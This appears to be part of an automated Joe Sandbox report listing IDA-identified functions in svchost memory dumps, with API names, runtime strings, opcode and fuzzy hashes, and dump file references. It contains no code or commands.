                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 24ef5facc02a821d60bac293c2cdd008fd7ac67383188b3ff3d8a6e4898980ff
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 56112E26B0574097EB24CB61E40C61A77B8FB46F85F08012ADA8E13794EF7DC958C785
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 0dbb33636f4aa29481ef908d38fbb0c69ffa5213cfb07c33621622ef40c5ca79
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: B151BB32F116008BEB54CB15E04CB6977DAE356F99F188260EA8B67788DF7CC849D781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: a53e6054c238db8a0a468d1f03734e917ee5925ff3720cd49feaeebe880c173b
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 07515932F042808BEB648B21D54C75877ACEB56F95F1C8116EA9947BA5CF3CC4A8CB42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 2bfff28e4bdb93d1066c74441c78e34621d0fb67657b1dd7a2dab7df0fb74e7f
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 7E61B532A04BC482DB608F15F44879AB7E4F786B95F084215EBCA27B65DF3CC194CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: e3a5e97954f67e6a1c8d0c8f3c508dd41d5073ae2f560c16e384641fd02a6191
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 61516D32B006808BEB748F15A54C35877E9F356F96F194116DA8BA7BA5CF3CC458C782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U$_$6Z
                                                          • API String ID: 442123175-928044984
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 3c18a2099e6c7607a8c850b194b1febbd0db2b2db086b31b6252ac2fd1ae9116
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 7E411932B25A8087EB10DF65E40D79AB7A8F34AB94F584121EE4E97794EF7CC409C741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: d52aa0bc1e528004bbd25824ae56c6a8c8689a2f7ecc8b630764f68c99525a19
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 83118121B1078197FB10DB25E80D79A62E8F74AF81F884425AE4AA3694EF6CC94DC781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                          • String ID: _$6Z
                                                          • API String ID: 838830666-452956228
                                                          • Opcode ID: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                          • Instruction ID: 2ea59cd195b9cf113dc22e59ecb6197495d658d470353f851a0b0b9b4abbc984
                                                          • Opcode Fuzzy Hash: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                          • Instruction Fuzzy Hash: 8821D634B05B0083FB40AB18F86D35876A8F786B44F984125D98FA77A1DF3CC54D9782
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 5726c44e6c94a0261d76dd1d18cec12993198ee48d381ce34b9c54260b87f620
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 64011332A10A90DAEB15DF66A80D24977B9F78AF84B094025DF4A63728DF38D495C741
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A6613128DF), ref: 000002A661312A12
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: 99fcf29c5a3e963d5d89bff97ca9893eee29e122c75244328e6b095d4ae27092
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: E991BD32B106548AFB609F75995E3AD3BA8F357F98F684106DE4B73A85DF38C4498302
                                                          APIs
                                                            • Part of subcall function 000002A66130E22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,000002A66130E578), ref: 000002A66130E256
                                                          • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,000002A66130E6A9), ref: 000002A66130E95B
                                                          • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,000002A66130E6A9), ref: 000002A66130E99F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID: _$6Z
                                                          • API String ID: 546120528-452956228
                                                          • Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                          • Instruction ID: 3b70e38f7f3651a8aed1fd291ae84bff09093ca3b1c53edec682f9b410165f4d
                                                          • Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                          • Instruction Fuzzy Hash: 1F81DDA2B0878087F7748F26A44C369B7E9B34AF41F0C4126D69B67691DF3DC589C382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: 99e5c642f4f55c8eec009b42682bbf97fdda9b94cf92ee47659fe36c31544b3d
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: CC717F36B00B8147EA75DE369A5C3AA67D8F386FC5F480016DD4B63B89DF39C6488781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 31519db6ff23ce1643a419b88b66537bc3dc62f726ee5451774d1edecf2df9ac
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: CA51D032F11A408BEB54CB29E44CB6973ADEB56F98F199121DA4A43788DF7CC889D701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 388f23e79857dfe91b296cf6aeac947bac3dece2c659ecc246db4c5be46963c7
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: FD619432E04BC486DB719F15E44879AB7A8FB86B88F085215EB9807B95DF7CC1D4CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 6477919070543908b71418fc128ff75b3537499485c48867988c523b9b399bcf
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: D551C626B0478143EA24DE3AA55C3AA67D9F396F91F5C0025DD5B63B8ADF3DC408C781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $_$6Z
                                                          • API String ID: 1807457897-202897188
                                                          • Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                          • Instruction ID: 5dbc481eb9dbb62ce7a9338736ef3f768b688ad8dc6010521dde16ef15a8b845
                                                          • Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                          • Instruction Fuzzy Hash: 89519F32B187C08BE7218F35E08C39E7BE4F34AB45F584126E68A57A85DB7CC159CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: _$6Z
                                                          • API String ID: 442123175-452956228
                                                          • Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                          • Instruction ID: 49ecc0358d925df9febc49d76be15aa4082e711f62654576775220482b2729a6
                                                          • Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                          • Instruction Fuzzy Hash: 1E31C072B11A4087DB209F25E98D789B3A8F75AB84F984021EB4E93754EF3CC459CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: _$6Z
                                                          • API String ID: 442123175-452956228
                                                          • Opcode ID: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                          • Instruction ID: eb630162fe33a24f5d6281626ec10f2b64d60a8839e30c3e11cec3fc7e2dbf8b
                                                          • Opcode Fuzzy Hash: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                          • Instruction Fuzzy Hash: 5E31D432B14A808BE7109F25E58D389B7A8F35AB80F984021EA4F93715DF3CC419C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastModuleName
                                                          • String ID: _$6Z
                                                          • API String ID: 2776309574-452956228
                                                          • Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                          • Instruction ID: ef7ccb93359cf4a03a3856de02cdd955765d71d88785fc35618747266aa0e613
                                                          • Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                          • Instruction Fuzzy Hash: 1B318432714B808BE760CB26E44C79E77E8F386B95F584125DA8D57A98DF3CC548CB82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 8868535241417ff7c8f5628e2c49a4153ef295f723a1763fb6d4bcb3b3db57a0
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: F5113432714B8082EB248F25E408349B7E9F789B84F584224EA8E17B68DF3CC555CB40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: fd7cdbad17168123059f6f9e7801b7036e0f5ea417c522ca255d78abc129a934
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 25117921B01B8082EA15DB66A80D25A77B4F78AFC4F5C4028DE4E63725EF3CC4468340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
